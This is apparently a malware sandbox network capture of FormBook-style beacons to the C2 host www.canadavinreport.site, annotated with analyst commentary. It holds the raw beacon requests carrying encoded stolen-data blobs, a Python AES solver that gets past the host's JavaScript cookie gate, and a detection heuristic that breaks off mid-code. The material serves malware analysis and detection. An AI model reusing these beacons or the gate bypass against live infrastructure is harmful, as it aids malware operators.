                                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;color: #5d5d5d;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial,"Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol","Noto Color Emoji";text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.75);text-align: center;}h1 {font-size: 2.45em;font-weight: 700;color: #5d5d5d;letter-spacing: -0.02em;margin-bottom: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}.info {color: #5594cf;fill: #5594cf;}.error [TRUNCATED]
                                                                                                                         Nov 21, 2024 16:23:20.782027006 CET | 1236 | IN | Data Raw: 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 63 39 32 31 32 37 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 77 61 72 6e 69 6e 67 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 66 66 63 63 33 33 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 66 66 63 63 33 33 3b 0a 09 09
                                                                                                                        Data Ascii: ;fill: #c92127;}.warning {color: #ffcc33;fill: #ffcc33;}.success {color: #5aba47;fill: #5aba47;}.icon-large {height: 132px;width: 132px;}.description-text {color: #707
                                                                                                                         Nov 21, 2024 16:23:20.782042027 CET | 698 | IN | Data Raw: 39 34 31 20 32 31 36 20 32 39 36 76 34 63 30 20 36 2e 36 32 37 20 35 2e 33 37 33 20 31 32 20 31 32 20 31 32 68 35 36 63 36 2e 36 32 37 20 30 20 31 32 2d 35 2e 33 37 33 20 31 32 2d 31 32 76 2d 31 2e 33 33 33 63 30 2d 32 38 2e 34 36 32 20 38 33 2e
                                                                                                                        Data Ascii: 941 216 296v4c0 6.627 5.373 12 12 12h56c6.627 0 12-5.373 12-12v-1.333c0-28.462 83.186-29.647 83.186-106.667 0-58.002-60.165-102-116.531-102zM256 338c-25.365 0-46 20.635-46 46 0 25.364 20.635 46 46 46s46-20.636 46-46c0-25.365-20.635-46-46-46z"


                                                                                                                         Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                         41 | 192.168.2.9 | 50015 | 185.27.134.206 | 80 | 6608 | C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
                                                                                                                         Timestamp | Bytes transferred | Direction | Data
                                                                                                                         Nov 21, 2024 16:23:27.061866999 CET | 616 | OUT | POST /cvhb/ HTTP/1.1
                                                                                                                        Host: www.canadavinreport.site
                                                                                                                        Accept: */*
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Origin: http://www.canadavinreport.site
                                                                                                                        Cache-Control: max-age=0
                                                                                                                        Content-Length: 192
                                                                                                                        Connection: close
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Referer: http://www.canadavinreport.site/cvhb/
                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                        Data Raw: 62 42 77 3d 54 5a 56 36 69 6c 35 6c 45 71 33 6a 77 59 56 49 50 58 74 35 63 54 5a 42 63 46 72 32 6a 56 67 78 4a 6a 33 6a 42 36 55 39 77 52 69 50 44 77 6c 35 70 2b 48 64 34 2f 6a 36 4d 72 72 6a 2b 4a 67 49 42 57 36 34 6b 66 6f 76 59 46 63 4d 4f 4c 72 4c 4e 4c 6d 65 38 64 68 4e 5a 4c 78 52 72 77 55 71 30 5a 79 55 52 61 68 42 56 67 52 6d 37 37 6e 63 4d 45 42 4a 4c 44 32 57 4c 2f 56 6f 5a 6f 7a 53 4c 6f 61 30 39 55 30 62 35 49 68 42 4f 59 75 64 4c 44 34 4b 51 55 51 62 52 71 73 6b 76 61 76 2b 34 52 53 50 5a 46 74 6b 33 4c 35 39 49 59 66 4e 41 6f 47 46 7a 6e 58 4f 63 47 56 4d
                                                                                                                        Data Ascii: bBw=TZV6il5lEq3jwYVIPXt5cTZBcFr2jVgxJj3jB6U9wRiPDwl5p+Hd4/j6Mrrj+JgIBW64kfovYFcMOLrLNLme8dhNZLxRrwUq0ZyURahBVgRm77ncMEBJLD2WL/VoZozSLoa09U0b5IhBOYudLD4KQUQbRqskvav+4RSPZFtk3L59IYfNAoGFznXOcGVM
                                                                                                                         Nov 21, 2024 16:23:28.410809994 CET | 1041 | IN | HTTP/1.1 200 OK
                                                                                                                        Server: nginx
                                                                                                                        Date: Thu, 21 Nov 2024 15:23:28 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 840
                                                                                                                        Connection: close
                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 61 65 73 2e 6a 73 22 20 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 74 6f 4e 75 6d 62 65 72 73 28 64 29 7b 76 61 72 20 65 3d 5b 5d 3b 64 2e 72 65 70 6c 61 63 65 28 2f 28 2e 2e 29 2f 67 2c 66 75 6e 63 74 69 6f 6e 28 64 29 7b 65 2e 70 75 73 68 28 70 61 72 73 65 49 6e 74 28 64 2c 31 36 29 29 7d 29 3b 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 74 6f 48 65 78 28 29 7b 66 6f 72 28 76 61 72 20 64 3d 5b 5d 2c 64 3d 31 3d 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 26 26 61 72 67 75 6d 65 6e 74 73 5b 30 5d 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 41 72 72 61 79 3f 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3a 61 72 67 75 6d 65 6e 74 73 2c 65 3d 22 22 2c 66 3d 30 3b 66 3c 64 2e 6c 65 6e 67 74 68 3b 66 2b 2b 29 65 2b 3d 28 31 36 3e 64 5b 66 5d 3f 22 30 22 3a 22 22 29 2b 64 5b 66 5d 2e 74 6f 53 74 72 69 6e 67 28 31 36 [TRUNCATED]
                                                                                                                        Data Ascii: <html><body><script type="text/javascript" src="/aes.js" ></script><script>function toNumbers(d){var e=[];d.replace(/(..)/g,function(d){e.push(parseInt(d,16))});return e}function toHex(){for(var d=[],d=1==arguments.length&&arguments[0].constructor==Array?arguments[0]:arguments,e="",f=0;f<d.length;f++)e+=(16>d[f]?"0":"")+d[f].toString(16);return e.toLowerCase()}var a=toNumbers("f655ba9d09a112d4968c63579db590b4"),b=toNumbers("98344c2eee86c3994890592585b49f80"),c=toNumbers("5b582b8a1d1d5797dc3cf1b91ab6dae1");document.cookie="__test="+toHex(slowAES.decrypt(c,2,a,b))+"; expires=Thu, 31-Dec-37 23:55:55 GMT; path=/"; location.href="http://www.canadavinreport.site/cvhb/?i=1";</script><noscript>This site requires Javascript to work, please enable Javascript in your browser or use a browser with Javascript support</noscript></body></html>


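Note on the response in session 41: the 840-byte body is not a C2 reply. The host places a JavaScript cookie challenge in front of /cvhb/; the script sets a cookie named __test to the hex of slowAES.decrypt(c, 2, a, b) and reloads the page with ?i=1. The sample's HTTP client does not run JavaScript and sends no Cookie header, so every beacon in the following sessions is answered by the same gate page. As an added example (not code from the report or from the gate's aes.js), the Python below reproduces the cookie value so that a replay harness or C2 emulator can get past the gate. It carries its own AES-128 block decryption so it runs without third-party packages. Assumptions: slowAES mode 2 is CBC, and for the single 16-byte block c the CBC decryption is one block decrypt XORed with the IV b; the function names are mine. One caveat to verify against a live page: slowAES.decrypt() also applies a heuristic PKCS#7 unpad to its output, which would shorten the cookie if the last plaintext bytes happen to look like padding.

```python
"""Reproduce the __test cookie set by the JavaScript gate captured above.

Added example, not Joe Sandbox or gate code. Pure-Python AES-128 so it runs
offline; a = key, b = IV, c = ciphertext are the hex constants from the response.
"""


def _xtime(a: int) -> int:
    """Multiply by x in GF(2^8) modulo the AES polynomial x^8 + x^4 + x^3 + x + 1."""
    a <<= 1
    return (a ^ 0x11B) if a & 0x100 else a


def _gmul(a: int, b: int) -> int:
    """Multiply two GF(2^8) elements (shift-and-add)."""
    r = 0
    while b:
        if b & 1:
            r ^= a
        a = _xtime(a)
        b >>= 1
    return r


def _gf_inv(x: int) -> int:
    """x^254 == x^-1 in GF(2^8) (group order 255); 0 maps to 0 as the S-box requires."""
    r, p, e = 1, x, 254
    while e:
        if e & 1:
            r = _gmul(r, p)
        p = _gmul(p, p)
        e >>= 1
    return r


def _build_sboxes() -> tuple:
    """Derive the AES S-box (GF inverse, then the affine map) and its inverse."""
    sbox = [0] * 256
    for x in range(256):
        b = _gf_inv(x)
        s = b
        for shift in range(1, 5):  # b ^ rotl(b,1) ^ rotl(b,2) ^ rotl(b,3) ^ rotl(b,4)
            s ^= ((b << shift) | (b >> (8 - shift))) & 0xFF
        sbox[x] = s ^ 0x63
    inv_sbox = [0] * 256
    for x, s in enumerate(sbox):
        inv_sbox[s] = x
    return sbox, inv_sbox


SBOX, INV_SBOX = _build_sboxes()


def _expand_key(key: bytes) -> list:
    """AES-128 key schedule: 11 round keys of 16 bytes, column-major like the state."""
    words = [list(key[i:i + 4]) for i in range(0, 16, 4)]
    rcon = 1
    for i in range(4, 44):
        t = list(words[i - 1])
        if i % 4 == 0:
            t = [SBOX[v] for v in t[1:] + t[:1]]  # RotWord, then SubWord
            t[0] ^= rcon
            rcon = _xtime(rcon)
        words.append([x ^ y for x, y in zip(words[i - 4], t)])
    return [sum(words[4 * r:4 * r + 4], []) for r in range(11)]


def _inv_shift_rows(s: list) -> list:
    """Undo ShiftRows; state index is 4*column + row."""
    return [s[4 * ((c - r) % 4) + r] for c in range(4) for r in range(4)]


def _inv_mix_columns(s: list) -> list:
    """Multiply each column by the inverse MixColumns matrix (14, 11, 13, 9)."""
    out = []
    for c in range(4):
        a0, a1, a2, a3 = s[4 * c:4 * c + 4]
        out += [
            _gmul(a0, 14) ^ _gmul(a1, 11) ^ _gmul(a2, 13) ^ _gmul(a3, 9),
            _gmul(a0, 9) ^ _gmul(a1, 14) ^ _gmul(a2, 11) ^ _gmul(a3, 13),
            _gmul(a0, 13) ^ _gmul(a1, 9) ^ _gmul(a2, 14) ^ _gmul(a3, 11),
            _gmul(a0, 11) ^ _gmul(a1, 13) ^ _gmul(a2, 9) ^ _gmul(a3, 14),
        ]
    return out


def aes128_decrypt_block(block: bytes, key: bytes) -> bytes:
    """Single-block AES-128 decryption (FIPS-197 inverse cipher)."""
    if len(block) != 16 or len(key) != 16:
        raise ValueError("block and key must be 16 bytes")
    rk = _expand_key(key)
    s = [b ^ k for b, k in zip(block, rk[10])]
    for rnd in range(9, 0, -1):
        s = [INV_SBOX[v] for v in _inv_shift_rows(s)]
        s = [v ^ k for v, k in zip(s, rk[rnd])]
        s = _inv_mix_columns(s)
    s = [INV_SBOX[v] for v in _inv_shift_rows(s)]
    return bytes(v ^ k for v, k in zip(s, rk[0]))


def solve_test_cookie(a_hex: str, b_hex: str, c_hex: str) -> str:
    """Hex value the gate stores as __test: CBC decryption of the one block c under key a, IV b."""
    key, iv, ct = (bytes.fromhex(h) for h in (a_hex, b_hex, c_hex))
    plain = aes128_decrypt_block(ct, key)
    return bytes(p ^ v for p, v in zip(plain, iv)).hex()


# Challenge constants copied from the captured response for www.canadavinreport.site.
CHALLENGE_A = "f655ba9d09a112d4968c63579db590b4"
CHALLENGE_B = "98344c2eee86c3994890592585b49f80"
CHALLENGE_C = "5b582b8a1d1d5797dc3cf1b91ab6dae1"

if __name__ == "__main__":
    print("__test=" + solve_test_cookie(CHALLENGE_A, CHALLENGE_B, CHALLENGE_C))
```

A replay client would send the printed value as "Cookie: __test=..." on the follow-up request to /cvhb/?i=1 (or the original query string plus &i=1, as in session 44's redirect target) to reach whatever sits behind the gate.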
                                                                                                                         Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                         42 | 192.168.2.9 | 50016 | 185.27.134.206 | 80 | 6608 | C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
                                                                                                                         Timestamp | Bytes transferred | Direction | Data
                                                                                                                         Nov 21, 2024 16:23:29.737035036 CET | 640 | OUT | POST /cvhb/ HTTP/1.1
                                                                                                                        Host: www.canadavinreport.site
                                                                                                                        Accept: */*
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Origin: http://www.canadavinreport.site
                                                                                                                        Cache-Control: max-age=0
                                                                                                                        Content-Length: 216
                                                                                                                        Connection: close
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Referer: http://www.canadavinreport.site/cvhb/
                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                        Data Raw: 62 42 77 3d 54 5a 56 36 69 6c 35 6c 45 71 33 6a 69 72 64 49 4e 78 6c 35 51 6a 5a 43 54 6c 72 32 36 6c 67 71 4a 6a 4c 6a 42 35 59 74 73 7a 32 50 41 53 74 35 6f 37 37 64 78 76 6a 36 48 4c 72 6d 78 70 67 39 42 57 6d 47 6b 61 49 76 59 45 34 4d 4f 4a 7a 4c 4e 38 79 64 38 4e 68 50 56 72 78 50 6b 51 55 71 30 5a 79 55 52 61 46 72 56 67 4a 6d 37 4c 33 63 4d 6c 42 47 55 7a 32 4a 4d 2f 56 6f 53 49 7a 57 4c 6f 61 47 39 56 34 69 35 4b 5a 42 4f 59 2b 64 4c 57 55 4c 48 45 51 42 66 4b 74 4b 6d 61 6d 33 37 68 4b 37 63 56 42 36 70 4b 31 75 43 5a 6a 54 52 61 50 65 6d 77 58 70 62 68 63 6b 61 5a 5a 79 66 46 78 45 71 54 4d 6e 46 6b 6c 4a 6b 73 4e 4b 59 77 3d 3d
                                                                                                                        Data Ascii: bBw=TZV6il5lEq3jirdINxl5QjZCTlr26lgqJjLjB5Ytsz2PASt5o77dxvj6HLrmxpg9BWmGkaIvYE4MOJzLN8yd8NhPVrxPkQUq0ZyURaFrVgJm7L3cMlBGUz2JM/VoSIzWLoaG9V4i5KZBOY+dLWULHEQBfKtKmam37hK7cVB6pK1uCZjTRaPemwXpbhckaZZyfFxEqTMnFklJksNKYw==
                                                                                                                         Nov 21, 2024 16:23:31.088588953 CET | 1041 | IN | HTTP/1.1 200 OK
                                                                                                                        Server: nginx
                                                                                                                        Date: Thu, 21 Nov 2024 15:23:30 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 840
                                                                                                                        Connection: close
                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 61 65 73 2e 6a 73 22 20 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 74 6f 4e 75 6d 62 65 72 73 28 64 29 7b 76 61 72 20 65 3d 5b 5d 3b 64 2e 72 65 70 6c 61 63 65 28 2f 28 2e 2e 29 2f 67 2c 66 75 6e 63 74 69 6f 6e 28 64 29 7b 65 2e 70 75 73 68 28 70 61 72 73 65 49 6e 74 28 64 2c 31 36 29 29 7d 29 3b 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 74 6f 48 65 78 28 29 7b 66 6f 72 28 76 61 72 20 64 3d 5b 5d 2c 64 3d 31 3d 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 26 26 61 72 67 75 6d 65 6e 74 73 5b 30 5d 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 41 72 72 61 79 3f 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3a 61 72 67 75 6d 65 6e 74 73 2c 65 3d 22 22 2c 66 3d 30 3b 66 3c 64 2e 6c 65 6e 67 74 68 3b 66 2b 2b 29 65 2b 3d 28 31 36 3e 64 5b 66 5d 3f 22 30 22 3a 22 22 29 2b 64 5b 66 5d 2e 74 6f 53 74 72 69 6e 67 28 31 36 [TRUNCATED]
                                                                                                                        Data Ascii: <html><body><script type="text/javascript" src="/aes.js" ></script><script>function toNumbers(d){var e=[];d.replace(/(..)/g,function(d){e.push(parseInt(d,16))});return e}function toHex(){for(var d=[],d=1==arguments.length&&arguments[0].constructor==Array?arguments[0]:arguments,e="",f=0;f<d.length;f++)e+=(16>d[f]?"0":"")+d[f].toString(16);return e.toLowerCase()}var a=toNumbers("f655ba9d09a112d4968c63579db590b4"),b=toNumbers("98344c2eee86c3994890592585b49f80"),c=toNumbers("5b582b8a1d1d5797dc3cf1b91ab6dae1");document.cookie="__test="+toHex(slowAES.decrypt(c,2,a,b))+"; expires=Thu, 31-Dec-37 23:55:55 GMT; path=/"; location.href="http://www.canadavinreport.site/cvhb/?i=1";</script><noscript>This site requires Javascript to work, please enable Javascript in your browser or use a browser with Javascript support</noscript></body></html>


                                                                                                                         Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                         43 | 192.168.2.9 | 50017 | 185.27.134.206 | 80 | 6608 | C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
                                                                                                                         Timestamp | Bytes transferred | Direction | Data
                                                                                                                         Nov 21, 2024 16:23:32.408984900 CET | 1653 | OUT | POST /cvhb/ HTTP/1.1
                                                                                                                        Host: www.canadavinreport.site
                                                                                                                        Accept: */*
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Origin: http://www.canadavinreport.site
                                                                                                                        Cache-Control: max-age=0
                                                                                                                        Content-Length: 1228
                                                                                                                        Connection: close
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Referer: http://www.canadavinreport.site/cvhb/
                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                        Data Raw: 62 42 77 3d 54 5a 56 36 69 6c 35 6c 45 71 33 6a 69 72 64 49 4e 78 6c 35 51 6a 5a 43 54 6c 72 32 36 6c 67 71 4a 6a 4c 6a 42 35 59 74 73 7a 4f 50 44 6e 68 35 70 59 54 64 72 76 6a 36 5a 37 72 6e 78 70 67 67 42 57 2b 43 6b 61 4d 2f 59 47 77 4d 4f 71 37 4c 4c 4f 4b 64 33 4e 68 50 49 62 78 4f 72 77 55 2f 30 5a 69 51 52 61 31 72 56 67 4a 6d 37 4f 37 63 46 55 42 47 50 7a 32 57 4c 2f 56 61 5a 6f 7a 2b 4c 6f 7a 78 39 56 38 74 35 37 35 42 41 63 69 64 4a 6b 73 4c 45 6b 51 48 59 4b 74 6b 6d 61 36 30 37 68 6d 52 63 56 31 45 70 4c 42 75 41 63 66 4b 4f 75 2f 6b 6c 43 44 45 55 47 45 46 64 35 4e 61 64 47 67 66 37 51 6f 78 46 32 30 4b 6f 74 31 48 45 4a 44 5a 68 37 50 51 76 30 73 62 47 30 2f 56 35 6e 37 32 4c 53 61 69 50 32 64 32 43 6b 4f 46 73 6e 42 4f 62 63 32 4d 51 6e 70 34 62 41 4a 52 5a 70 50 79 66 34 52 32 50 79 74 66 74 6b 36 62 76 65 31 43 52 67 51 72 34 34 55 64 56 51 58 5a 4f 69 64 59 44 45 63 47 57 77 30 45 4e 65 4d 37 67 49 4b 35 63 50 6a 35 39 42 2b 75 5a 56 4e 38 36 59 2f 72 47 36 34 4a 46 6e 7a 6e 66 58 [TRUNCATED]
                                                                                                                         Data Ascii: bBw=[TRUNCATED]
                                                                                                                         Nov 21, 2024 16:23:33.694612026 CET | 1041 | IN | HTTP/1.1 200 OK
                                                                                                                        Server: nginx
                                                                                                                        Date: Thu, 21 Nov 2024 15:23:33 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 840
                                                                                                                        Connection: close
                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 61 65 73 2e 6a 73 22 20 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 74 6f 4e 75 6d 62 65 72 73 28 64 29 7b 76 61 72 20 65 3d 5b 5d 3b 64 2e 72 65 70 6c 61 63 65 28 2f 28 2e 2e 29 2f 67 2c 66 75 6e 63 74 69 6f 6e 28 64 29 7b 65 2e 70 75 73 68 28 70 61 72 73 65 49 6e 74 28 64 2c 31 36 29 29 7d 29 3b 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 74 6f 48 65 78 28 29 7b 66 6f 72 28 76 61 72 20 64 3d 5b 5d 2c 64 3d 31 3d 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 26 26 61 72 67 75 6d 65 6e 74 73 5b 30 5d 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 41 72 72 61 79 3f 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3a 61 72 67 75 6d 65 6e 74 73 2c 65 3d 22 22 2c 66 3d 30 3b 66 3c 64 2e 6c 65 6e 67 74 68 3b 66 2b 2b 29 65 2b 3d 28 31 36 3e 64 5b 66 5d 3f 22 30 22 3a 22 22 29 2b 64 5b 66 5d 2e 74 6f 53 74 72 69 6e 67 28 31 36 [TRUNCATED]
                                                                                                                        Data Ascii: <html><body><script type="text/javascript" src="/aes.js" ></script><script>function toNumbers(d){var e=[];d.replace(/(..)/g,function(d){e.push(parseInt(d,16))});return e}function toHex(){for(var d=[],d=1==arguments.length&&arguments[0].constructor==Array?arguments[0]:arguments,e="",f=0;f<d.length;f++)e+=(16>d[f]?"0":"")+d[f].toString(16);return e.toLowerCase()}var a=toNumbers("f655ba9d09a112d4968c63579db590b4"),b=toNumbers("98344c2eee86c3994890592585b49f80"),c=toNumbers("5b582b8a1d1d5797dc3cf1b91ab6dae1");document.cookie="__test="+toHex(slowAES.decrypt(c,2,a,b))+"; expires=Thu, 31-Dec-37 23:55:55 GMT; path=/"; location.href="http://www.canadavinreport.site/cvhb/?i=1";</script><noscript>This site requires Javascript to work, please enable Javascript in your browser or use a browser with Javascript support</noscript></body></html>


                                                                                                                         Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                         44 | 192.168.2.9 | 50018 | 185.27.134.206 | 80 | 6608 | C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
                                                                                                                         Timestamp | Bytes transferred | Direction | Data
                                                                                                                         Nov 21, 2024 16:23:35.057307959 CET | 346 | OUT | GET /cvhb/?bBw=eb9ahS5GFYDOhq0JOiIrfnQwKg301mZRXDTXF/EDnGWOAiF9jJHx+uvzEaHIq78+HHS43fAza3sJA+7AAuSew4ovcqpU8EMNhqKZYp0bCjlC2qCkSQ==&PBk=f4VDN8Bp14IhbV HTTP/1.1
                                                                                                                        Host: www.canadavinreport.site
                                                                                                                        Accept: */*
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Connection: close
                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                         Nov 21, 2024 16:23:36.403729916 CET | 1181 | IN | HTTP/1.1 200 OK
                                                                                                                        Server: nginx
                                                                                                                        Date: Thu, 21 Nov 2024 15:23:36 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 980
                                                                                                                        Connection: close
                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 61 65 73 2e 6a 73 22 20 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 74 6f 4e 75 6d 62 65 72 73 28 64 29 7b 76 61 72 20 65 3d 5b 5d 3b 64 2e 72 65 70 6c 61 63 65 28 2f 28 2e 2e 29 2f 67 2c 66 75 6e 63 74 69 6f 6e 28 64 29 7b 65 2e 70 75 73 68 28 70 61 72 73 65 49 6e 74 28 64 2c 31 36 29 29 7d 29 3b 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 74 6f 48 65 78 28 29 7b 66 6f 72 28 76 61 72 20 64 3d 5b 5d 2c 64 3d 31 3d 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 26 26 61 72 67 75 6d 65 6e 74 73 5b 30 5d 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 41 72 72 61 79 3f 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3a 61 72 67 75 6d 65 6e 74 73 2c 65 3d 22 22 2c 66 3d 30 3b 66 3c 64 2e 6c 65 6e 67 74 68 3b 66 2b 2b 29 65 2b 3d 28 31 36 3e 64 5b 66 5d 3f 22 30 22 3a 22 22 29 2b 64 5b 66 5d 2e 74 6f 53 74 72 69 6e 67 28 31 36 [TRUNCATED]
                                                                                                                        Data Ascii: <html><body><script type="text/javascript" src="/aes.js" ></script><script>function toNumbers(d){var e=[];d.replace(/(..)/g,function(d){e.push(parseInt(d,16))});return e}function toHex(){for(var d=[],d=1==arguments.length&&arguments[0].constructor==Array?arguments[0]:arguments,e="",f=0;f<d.length;f++)e+=(16>d[f]?"0":"")+d[f].toString(16);return e.toLowerCase()}var a=toNumbers("f655ba9d09a112d4968c63579db590b4"),b=toNumbers("98344c2eee86c3994890592585b49f80"),c=toNumbers("5b582b8a1d1d5797dc3cf1b91ab6dae1");document.cookie="__test="+toHex(slowAES.decrypt(c,2,a,b))+"; expires=Thu, 31-Dec-37 23:55:55 GMT; path=/"; location.href="http://www.canadavinreport.site/cvhb/?bBw=eb9ahS5GFYDOhq0JOiIrfnQwKg301mZRXDTXF/EDnGWOAiF9jJHx+uvzEaHIq78+HHS43fAza3sJA+7AAuSew4ovcqpU8EMNhqKZYp0bCjlC2qCkSQ==&PBk=f4VDN8Bp14IhbV&i=1";</script><noscript>This site requires Javascript to work, please enable Javascript in your browser or use a browser with Javascript support</noscript></body></html>


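Sessions 41 to 44 show the beacon shape the injected process uses against www.canadavinreport.site: POST (41 to 43) or GET (44) to the same short path, one or two three-character parameters carrying an opaque base64-like blob, a fixed legacy IE User-Agent ending in a MATMJS token, Referer equal to Origin plus the path, Cache-Control: max-age=0 and Connection: close on every request, with only the blob length changing between check-ins. As an added example (not code from the report), the Python below parses raw HTTP requests and scores those traits so the same shape can be picked out of proxy logs for other hosts. The two malicious requests embedded in it are copied from sessions 41 and 44; the benign login POST is constructed for contrast. The patterns, their names and the threshold of three indicators are assumptions drawn from these captures, not a published FormBook signature, and will need tuning on real traffic.

```python
"""Heuristic triage of raw HTTP requests for FormBook-style C2 beacons.

Added example, not Joe Sandbox or FormBook code. Every indicator below is an
assumption derived from the requests captured on this page, not a published
FormBook signature; tune the patterns and threshold before relying on them.
"""
from __future__ import annotations

import re

# Session 41 request, copied from the capture above (headers verbatim, body as logged).
SAMPLE_POST = (
    "POST /cvhb/ HTTP/1.1\r\n"
    "Host: www.canadavinreport.site\r\n"
    "Accept: */*\r\n"
    "Accept-Encoding: gzip, deflate\r\n"
    "Accept-Language: en-US,en;q=0.9\r\n"
    "Origin: http://www.canadavinreport.site\r\n"
    "Cache-Control: max-age=0\r\n"
    "Content-Length: 192\r\n"
    "Connection: close\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Referer: http://www.canadavinreport.site/cvhb/\r\n"
    "User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)\r\n"
    "\r\n"
    "bBw=TZV6il5lEq3jwYVIPXt5cTZBcFr2jVgxJj3jB6U9wRiPDwl5p+Hd4/j6Mrrj+JgIBW64kfovYFcMOLrLNLme8dhNZLxRrwUq0ZyURahBVgRm77ncMEBJLD2WL/VoZozSLoa09U0b5IhBOYudLD4KQUQbRqskvav+4RSPZFtk3L59IYfNAoGFznXOcGVM"
)

# Session 44 request, copied from the capture above (GET variant, no body).
SAMPLE_GET = (
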